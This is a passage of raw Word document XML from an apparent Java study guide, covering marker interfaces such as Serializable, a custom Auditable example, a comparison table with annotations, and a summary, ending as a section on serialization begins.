        </w:rPr>
        <w:t xml:space="preserve">, Java libraries and JVM use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instanceof checks or reflection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to apply behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111DF728" w14:textId="77777777" w:rsidR="001000DF" w:rsidRPr="00CE4B95"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756159"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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bjec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stanceo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rializabl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59F64EA" w14:textId="77777777" w:rsidR="001000DF" w:rsidRPr="00CE4B95"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7561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afe to serialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44F142" w14:textId="6BB0083A" w:rsidR="001000DF" w:rsidRPr="00CE4B95"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756159"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970E3E4" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003D1045">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7DD55874">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE397B0" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">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Custom Marker Interface Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A00C8A" w14:textId="77777777" w:rsidR="001000DF" w:rsidRPr="00CE4B95"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0340641"/>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erfac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uditab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arker interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770DFB59" w14:textId="77777777" w:rsidR="001000DF" w:rsidRPr="00CE4B95"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0340641"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7070C7" w14:textId="77777777" w:rsidR="001000DF" w:rsidRPr="00CE4B95"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0340641"/>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ransacti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mplement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uditab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AA36E6A" w14:textId="77777777" w:rsidR="001000DF" w:rsidRPr="00CE4B95"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034064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business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9ACAC3" w14:textId="61FDD9FA" w:rsidR="001000DF" w:rsidRPr="00CE4B95"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0340641"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552AC16" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A framework might look for Auditable-tagged classes and log changes automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA095FF" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003D1045">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7CAF51F3">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA70E7B" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">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Marker Interface vs Annot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1"/>
        <w:gridCol w:w="1742"/>
        <w:gridCol w:w="3568"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="6ED951DE" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19E38364" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="001000DF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48344CCC" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="001000DF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Marker Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1973142A" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="001000DF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="19F75EB9" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22269DD9" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Introduced in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E824C66" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27B9B23C" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="25A5AFD2" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41F99827" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F4EEBCF" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can use instanceof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31B91D4C" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cannot use instanceof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="0DA58627" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6056E281" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Flexibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="003C5931" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2636569D" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>More flexible (can include data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w14:paraId="215DAABD" w14:textId="77777777" w:rsidTr="00C35D0A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2218421D" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Preferred now?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17AD1201" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">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Old style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65985E11" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">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Recommended (modern approach)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="216BD21B" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003D1045">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6CE7C233">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40680730" w14:textId="5A3F37C1" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A" w:rsidP="003D1045">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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E88ACF" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Marker interfaces = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>empty interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mark classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for special treatment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01222741" w14:textId="77777777" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C35D0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Still used (e.g., Serializable), but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations are more powerful and flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> today</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F81EB5" w14:textId="01D849D0" w:rsidR="00C35D0A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C35D0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3DCD2384">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1175CF" w14:textId="4A3AAE18" w:rsidR="00A8268C" w:rsidRPr="00CE4B95" w:rsidRDefault="009A6E11">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc196307490"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is serialization and deserialization</w:t>
      </w:r>
      <w:r w:rsidR="00E9672A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="12AEBBA4" w14:textId="77777777" w:rsidR="00374AB1" w:rsidRPr="00CE4B95" w:rsidRDefault="00374AB1" w:rsidP="00460B80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
